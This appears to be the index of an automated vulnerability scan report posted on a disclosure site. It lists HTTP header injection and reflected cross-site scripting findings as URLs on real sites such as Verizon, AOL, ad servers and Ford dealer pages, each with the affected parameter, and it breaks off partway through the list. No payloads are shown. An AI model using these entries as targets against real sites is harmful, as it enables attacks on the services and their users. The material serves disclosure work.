XSS, Cross Site Scripting, verizon.com, CWE-79, CAPEC-86, DORK, GHDB

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. HTTP header injection


1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://vulnerable.verizon.host/adi/N2870.vznbiz/B3160296 [REST URL parameter 1]

1.4. http://vulnerable.verizon.host/dot.gif [REST URL parameter 1]

1.5. http://amch.questionmarket.com/adscgen/st.php [ES cookie]

1.6. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.7. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.8. http://anrtx.tacoda.net/rtx/r.js [N cookie]

1.9. http://anrtx.tacoda.net/rtx/r.js [si parameter]

1.10. https://auth.verizon.com/amserver/UI/Login [goto parameter]

1.11. https://auth.verizon.net/amserver/UI/Login [goto parameter]

2. Cross-site scripting (reflected)

2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]

2.2. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

2.3. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

2.4. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

2.5. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

2.6. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

2.7. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

2.8. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

2.9. http://vulnerable.verizon.host/adi/N2883.158901.DATAXU.COM/B4947916 [sz parameter]

2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]

2.11. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [sz parameter]

2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]

2.13. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [sz parameter]

2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]

2.15. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [sz parameter]

2.16. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

2.17. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

2.18. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

2.20. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

2.21. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

2.22. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

2.23. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

2.24. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

2.25. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

2.26. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

2.27. http://vulnerable.verizon.host/adj/N4682.Acerno/B4830992.3 [click parameter]

2.28. http://vulnerable.verizon.host/click [h parameter]

2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]

2.30. http://vulnerable.verizon.host/clk [210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter]

2.31. http://vulnerable.verizon.host/clk [cnt parameter]

2.32. http://vulnerable.verizon.host/clk [gcid parameter]

2.33. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

2.34. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

2.35. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

2.36. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

2.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

2.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

2.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter]

2.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

2.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

2.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

2.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]

2.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

2.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

2.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

2.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

2.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

2.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

2.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

2.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

2.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

2.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

2.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]

2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.62. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

2.63. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

2.64. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

2.65. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

2.66. http://ads.pointroll.com/PortalServe/ [dom parameter]

2.67. http://ads.pointroll.com/PortalServe/ [flash parameter]

2.68. http://ads.pointroll.com/PortalServe/ [r parameter]

2.69. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.70. http://ads.pointroll.com/PortalServe/ [time parameter]

2.71. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

2.72. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

2.73. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

2.74. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [AdId parameter]

2.75. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

2.76. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [loc parameter]

2.77. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.78. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [loc parameter]

2.79. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.80. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [loc parameter]

2.81. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.82. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [loc parameter]

2.83. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.84. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [loc parameter]

2.85. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.86. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [loc parameter]

2.87. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.88. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [loc parameter]

2.89. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.90. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.91. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [loc parameter]

2.92. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.93. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [loc parameter]

2.94. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.95. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

2.96. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

2.97. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.98. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.99. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

2.100. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

2.101. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.102. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.103. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

2.104. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

2.105. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.106. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.107. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [loc parameter]

2.108. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.109. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [loc parameter]

2.110. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.111. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

2.112. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

2.113. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.114. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [loc parameter]

2.115. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.116. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [loc parameter]

2.117. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.118. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.119. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.120. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.121. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.122. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

2.123. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

2.124. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.125. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.126. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [loc parameter]

2.127. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.128. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

2.129. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

2.130. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.131. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.132. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

2.133. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

2.134. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.135. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.136. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.137. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.138. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [loc parameter]

2.139. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.140. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

2.141. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

2.142. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.143. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.144. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

2.145. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

2.146. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.147. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.148. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

2.149. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

2.150. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.151. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.152. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [loc parameter]

2.153. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [name of an arbitrarily supplied request parameter]

2.154. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

2.155. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

2.156. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.157. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

2.158. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

2.159. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

2.160. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

2.161. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

2.162. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

2.163. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

2.164. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

2.165. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.166. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpt parameter]

2.167. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpvc parameter]

2.168. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [name of an arbitrarily supplied request parameter]

2.169. http://artsbeat.blogs.nytimes.com/2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/ [src parameter]

2.170. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

2.171. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

2.172. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

2.173. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

2.174. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

2.175. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

2.176. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

2.177. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

2.178. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

2.179. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 1]

2.180. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 2]

2.181. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 3]

2.182. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 4]

2.183. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 5]

2.184. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 6]

2.185. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 7]

2.186. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [name of an arbitrarily supplied request parameter]

2.187. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [noperf parameter]

2.188. http://atwar.blogs.nytimes.com/2010/11/19/recounting-war/ [src parameter]

2.189. https://auth.verizon.com/amserver/UI/Login [goto parameter]

2.190. https://auth.verizon.com/amserver/UI/Login [module parameter]

2.191. https://auth.verizon.com/amserver/UI/Login [realm parameter]

2.192. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.193. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.194. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.195. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.196. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.197. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.198. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.199. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.200. http://bats.blogs.nytimes.com/2010/11/19/yankees-pick-larry-rothschild-as-pitching-coach/ [src parameter]

2.201. http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/ [name of an arbitrarily supplied request parameter]

2.202. http://body.aol.com/ [name of an arbitrarily supplied request parameter]

2.203. http://bp2.forddirect.fordvehicles.com/ [name of an arbitrarily supplied request parameter]

2.204. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [branding parameter]

2.205. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [lang parameter]

2.206. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.207. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [referringSite parameter]

2.208. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [branding parameter]

2.209. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [lang parameter]

2.210. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.211. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [referringSite parameter]

2.212. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [branding parameter]

2.213. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [lang parameter]

2.214. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.215. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [referringSite parameter]

2.216. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [branding parameter]

2.217. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [lang parameter]

2.218. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.219. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [referringSite parameter]

2.220. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [branding parameter]

2.221. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [lang parameter]

2.222. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.223. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [referringSite parameter]

2.224. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [branding parameter]

2.225. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [lang parameter]

2.226. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.227. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [referringSite parameter]

2.228. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [branding parameter]

2.229. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [lang parameter]

2.230. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.231. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [referringSite parameter]

2.232. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [branding parameter]

2.233. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [lang parameter]

2.234. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.235. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [referringSite parameter]

2.236. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [branding parameter]

2.237. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [lang parameter]

2.238. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.239. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [referringSite parameter]

2.240. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [branding parameter]

2.241. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [lang parameter]

2.242. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.243. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [referringSite parameter]

2.244. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [branding parameter]

2.245. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [lang parameter]

2.246. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.247. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [referringSite parameter]

2.248. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [branding parameter]

2.249. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [lang parameter]

2.250. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.251. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [referringSite parameter]

2.252. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [branding parameter]

2.253. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [lang parameter]

2.254. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.255. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [referringSite parameter]

2.256. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [branding parameter]

2.257. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [lang parameter]

2.258. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.259. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [referringSite parameter]

2.260. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [branding parameter]

